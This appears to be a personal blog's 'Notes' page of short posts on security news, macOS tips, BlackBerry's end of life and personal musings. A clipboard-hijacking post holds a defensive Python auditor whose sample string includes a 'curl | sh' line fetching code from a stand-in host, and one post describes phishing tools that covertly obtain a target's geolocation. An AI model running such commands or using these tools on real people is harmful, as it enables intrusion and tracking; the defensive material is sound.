Notes


BlackBerry is gone, Mozilla is next in line

Friendly reminder: now that BlackBerry is gone, Mozilla is next in line.

Just stick to the light

Just stick to the light, don’t ruminate in darkness or you’ll start to become that way.

How to get hacked by accidentally copy pasting

This is why you should never paste commands from the web straight into your terminal. Ask any developer or admin whether they have ever copied a command line or code snippet from the web; the answer is almost certainly yes. You would assume that what you copy is what you paste, right? Well, nope!

You think you are copying one thing, but the page's JavaScript can replace the clipboard contents in a copy-event handler with something else, such as malicious code, and if the substituted text ends with a newline the shell runs it the moment you paste. All it takes is a single line injected into the snippet you copied to create a backdoor in your app. Paste into an editor first, or rely on a shell with bracketed paste enabled, which shows the pasted text before executing it.
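A quick way to look at what actually landed in the clipboard before running it, as an added example that is not part of the original post or the linked article. It treats the clipboard contents as a plain string (how you obtain it, pbpaste, xclip or a GUI, is left to the reader) and reports the tricks a hostile page can hide in a copied snippet: embedded line terminators, terminal escape sequences and invisible or bidirectional Unicode characters. The sample strings at the bottom are constructed.

```python
"""Audit text from the clipboard before pasting it into a shell (added example)."""
from __future__ import annotations

import re
import unicodedata

# Code points that render as nothing but are still pasted into the terminal.
INVISIBLE = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
}
# Bidirectional overrides and isolates: the "Trojan Source" characters.
BIDI = frozenset("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
# ESC [ ... final-byte: CSI sequences that can clear or repaint the screen.
CSI = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")


def audit_clipboard(text: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing hidden was found."""
    findings: list[str] = []

    def note(msg: str) -> None:
        if msg not in findings:
            findings.append(msg)

    if "\n" in text or "\r" in text:
        note("line terminator present: the shell will run the command on paste")
    if CSI.search(text) or "\x1b" in text:
        note("terminal escape sequence present: output can be repainted to hide text")
    for ch in text:
        if ch in INVISIBLE:
            note(f"invisible character U+{ord(ch):04X} ({INVISIBLE[ch]})")
        elif ch in BIDI:
            note(f"bidi control U+{ord(ch):04X} ({unicodedata.name(ch)})")
        elif unicodedata.category(ch) == "Cc" and ch not in "\n\r\t\x1b":
            note(f"control character U+{ord(ch):04X}")
    return findings


def reveal(text: str) -> str:
    """Escaped view of the text so every hidden byte is visible on screen."""
    return text.encode("unicode_escape").decode("ascii")


if __name__ == "__main__":
    # Constructed sample: what a page shows vs. what its copy handler puts on the clipboard.
    shown = "sudo apt update"
    copied = "sudo apt update\u200b\ncurl -s http://example.invalid/x | sh\n"
    print("shown  :", reveal(shown))
    print("copied :", reveal(copied))
    for finding in audit_clipboard(copied):
        print(" -", finding)
```

The check is deliberately on the string, not on the page: the substitution happens in the browser, so the only thing you can trust is what is in the clipboard once it gets there.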

How to get hacked by accidentally copy pasting

ProxyBroker

ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.

  • Finds more than 7000 working proxies from ~50 sources.
  • Supported protocols: HTTP(S), SOCKS4/5. Also the CONNECT method to ports 80 and 25 (SMTP).
  • Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.
  • Works as a proxy server that distributes incoming requests to external proxies, with automatic proxy rotation.
  • All proxies are checked to support Cookies and Referer (and POST requests if required).
  • Automatically removes duplicate proxies.
  • Is asynchronous.

ProxyBroker

Happy New Year!

Wishing you 12 months of success, 52 weeks of laughter, 365 days of fun, 8760 hours of joy, 525600 minutes of good luck, and 31536000 seconds of happiness. Happy New Year!

How to geolocate a user

Tools for determining the exact geolocation of a user (in practice the location of their smartphone, tablet or PC). The algorithm is simple: the tool creates a “phishing” site that asks the browser for the user’s geolocation and forwards it to you. Thus, using social engineering techniques and these tools, you can obtain the geolocation, browser fingerprint, IP address and device information. Two caveats: the browser shows a permission prompt, so this only works if the target accepts it, and the precision depends on the device’s location source (GPS on a phone is precise; Wi-Fi or IP-based lookups on a PC can be off by kilometres).

Flagpro: The new malware used by BlackTech

Flagpro is used in the initial stage of attacks to investigate the target’s environment, then download and execute second-stage malware. An attack using Flagpro starts with a spear-phishing e-mail tailored to the target organization and disguised as correspondence with the target’s business partner, which means the attackers probed the target before attacking.

The attackers attach a password-protected archive (ZIP or RAR) to the e-mail and write its password in the message; a mail gateway cannot scan the contents without that password. The archive contains an xlsm file with a malicious macro, and if the user enables the macro, the malware is dropped. The content of the xlsm file is also adjusted to the target, so the file does not look out of place to the recipient.
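As an added example (not NTT’s code and not from the original post), a detection routine for the delivery pattern just described: a password-protected archive whose password is in the body and which contains a macro-enabled Office file. Everything here is constructed: the sender and recipient addresses, the subject, the password phrase and the ZIP, which only carries the “encrypted” flag rather than real encryption so the check can run offline.

```python
"""Flag mail that matches the Flagpro delivery pattern (added example, not NTT's code).

Pattern: password-protected ZIP attachment, password written in the body,
macro-enabled Office document inside. The mail and the ZIP are constructed
inline; the ZIP only carries the "encrypted" flag so that the detector can
be exercised without real ZIP encryption.
"""
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

MACRO_EXTS = (".xlsm", ".docm", ".pptm", ".xls", ".doc")
# "password: X", "Password X", "passcode X" and the Japanese word for password.
PASSWORD_RE = re.compile(r"(password|passcode|パスワード)\s*[:：]?\s*\S+", re.I)


def zip_entries(blob: bytes) -> list:
    """(name, encrypted?) per entry. Names are stored in clear even in encrypted ZIPs,
    so a gateway can see an .xlsm inside without knowing the password."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [(i.filename, bool(i.flag_bits & 0x1)) for i in zf.infolist()]


def assess_message(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    verdict = {"password_in_body": False, "encrypted_archive": False,
               "macro_document": False, "attachments": []}
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = part.get_filename()
        if name is None:
            if part.get_content_type() == "text/plain":
                verdict["password_in_body"] |= bool(PASSWORD_RE.search(part.get_content()))
            continue
        verdict["attachments"].append(name)
        if name.lower().endswith(".zip"):
            entries = zip_entries(part.get_payload(decode=True))
            verdict["encrypted_archive"] |= any(enc for _, enc in entries)
            verdict["macro_document"] |= any(n.lower().endswith(MACRO_EXTS) for n, _ in entries)
        # RAR archives keep the same information in their own header format; not parsed here.
    verdict["suspicious"] = (verdict["password_in_body"] and verdict["encrypted_archive"]
                             and verdict["macro_document"])
    return verdict


def constructed_encrypted_zip(name: str, payload: bytes) -> bytes:
    """ZIP with general-purpose bit 0 (encrypted) set in both headers. Constructed test
    input: the data is not really encrypted, only the flag the detector looks at is."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, payload)
    blob = bytearray(buf.getvalue())
    blob[6] |= 0x01                                  # local file header, offset 6: flags
    blob[blob.index(b"PK\x01\x02") + 8] |= 0x01      # central directory header, offset 8: flags
    return bytes(blob)


def constructed_sample_mail(with_archive: bool = True) -> bytes:
    """A constructed lure in the style described above (addresses and names are made up)."""
    msg = EmailMessage()
    msg["From"] = "partner@example.invalid"
    msg["To"] = "target@example.invalid"
    msg["Subject"] = "Re: Q4 order confirmation"
    msg.set_content("Please check the attached file.\nPassword: Q4-2021\n")
    if with_archive:
        blob = constructed_encrypted_zip("Q4_order.xlsm", b"not a real workbook")
        msg.add_attachment(blob, maintype="application", subtype="zip", filename="Q4_order.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(assess_message(constructed_sample_mail()))
```

The point of checking the ZIP flag bits and the entry names rather than the payload is that both are readable without the password, so the gateway can act on the combination (encrypted archive + password in body + macro document inside) even though it cannot inspect the macro itself.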

Flagpro: The new malware used by BlackTech

Practical bruteforce of military grade AES-1024

Sony, SanDisk and Lexar ship encryption software with their USB keys, hard drives and other storage products. The software is preinstalled on a new product and is meant to keep the data on it safe. It is developed by a third party called ENCSecurity. The security claims of this solution were very strong, e.g. “Ultimate encryption using 1024 bit AES keys Military grade”. Our analysis of the DataVault software revealed three serious flaws impacting the security of the DataVault solution. This presentation is a look at the flaws we identified, along with our process for discovery and how the vulnerabilities were addressed.

(AES is only defined for 128-, 192- and 256-bit keys; “AES-1024” is the vendor’s marketing label, not a standard cipher.)

CVE-2021-44733 - Fuzzing and exploitation of a use-after-free in the Linux TEE

Recently a use-after-free vulnerability was discovered in the Linux kernel TEE subsystem, affecting versions up to and including 5.15.11, and was assigned CVE-2021-44733.

At first glance it did not seem exploitable, for several reasons; however, after further analysis of the vulnerable code path and a crude proof-of-concept exploit it was possible to overwrite a function pointer in the kernel. No privilege-escalation payload is presented in the post, but the entire environment for running OP-TEE and the exploit is available for further testing; see ‘Setting up the environment’.

CVE-2021-44733 - Fuzzing and exploitation of a use-after-free in the Linux kernel TEE subsystem

Blackberry devices and services EOL January 4, 2022

As a reminder, the legacy services for BlackBerry 7.1 OS and earlier, BlackBerry 10 software, and BlackBerry PlayBook OS 2.1 and earlier will no longer be available after January 4, 2022. From that date, devices running these legacy services and software, over either carrier or Wi-Fi connections, will no longer reliably function, including for data, phone calls, SMS and 9-1-1.

macOS Monterey IPv6 off

Quick tip if you want IPv6 off on macOS 12 Monterey, since Apple removed the Off option from the Configure IPv6 menu, for your own safety, of course. “Wi-Fi” and “Ethernet” are network service names as listed by networksetup -listallnetworkservices; use the names shown on your own machine, which may differ for USB or Thunderbolt adapters:

On WiFi:

$ networksetup -setv6off Wi-Fi

On Ethernet:

$ networksetup -setv6off Ethernet

NotLegit: Azure App Service vulnerability exposed hundreds of repositories

The Wiz Research Team detected an insecure default behavior in the Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby or Node that were deployed using “Local Git”. The vulnerability, which we dubbed “NotLegit”, has existed since September 2017 and has probably been exploited in the wild.

Wiz reported this security flaw to Microsoft on October 7th, 2021, and by now it has been mitigated. Small groups of customers are still potentially exposed and should take certain user actions to protect their applications, as detailed in several email alerts Microsoft issued between the 7th and 15th of December, 2021. The exposure was the .git directory being served from the site’s web root, so a quick check for your own apps is to request /.git/HEAD on the site and confirm it does not return repository metadata.

NotLegit: Azure App Service vulnerability exposed hundreds of source code repositories

4chan never ceases to amaze me

Just tried to fix my old Dell laptop. I opened it, tried fiddling with the heat sink and stuff, and then opened the BIOS with the innards still exposed… and then it suddenly started playing what sounded like a dodo do dodo tune at a volume 10x louder than I thought the speakers could produce, and then after that started making an ominous urgent beeping noise, but even louder. At that point I thought oh fuck it’s gonna explode or shock me. I tried to pull out the battery and power cable and recoiled back in pursuit of cover, but fell sideways out of my rocking chair, hitting my head on the doors beside me. What the FUCK happened?

4chan never ceases to amaze me.

CVE-2021-30853 - Where's the Interpreter!?

The astute reader may have noticed that although the script starts with the familiar #! (“shebang”), it is missing an interpreter such as /bin/bash. Yet when launched, macOS handles this without issue and still executes the script.

Specifically, as the process monitor output in the post shows, when launched you first see launchd exec’ing xpcproxy. This then executes /bin/sh, which in turn executes /bin/bash to run the PoC (which has been translocated, as it came from the Internet).

Where’s the Interpreter!? (CVE-2021-30853)

LinkedIn Silently Deleted Several of My Posts

Earlier this month, I posted a link to an article I wrote, titled Burning Witches, on LinkedIn. When I checked to see whether there were any comments, the post was gone. I was given no notification and received no e-mails indicating that the post had been removed. I’ve previously written about how Facebook is hostile to smaller platforms. It seems LinkedIn is also participating in the new era of corporate censorship, but what makes its actions more sinister is that it does so without giving users any notification of post removal.

The meaning of life

If you attempt to understand the “meaning of life”, you will always come to the conclusion that it is inherently meaningless.

Free market?

There never was a free market, not in the Middle Ages and definitely not now. Back then you had guilds monopolising jobs; now you have regulators rigging the market. The modern big tech companies learned the hard way that they have to live with burning money on bribes and playing the politics game; they struggled with it for quite a while while trying to ignore it.

The warm glow of the phosphor

The warm glow of the phosphor burns your eyes, as the rhythmic echo of the keyboard rings in your ears. Day and night blend into one, and time stands still.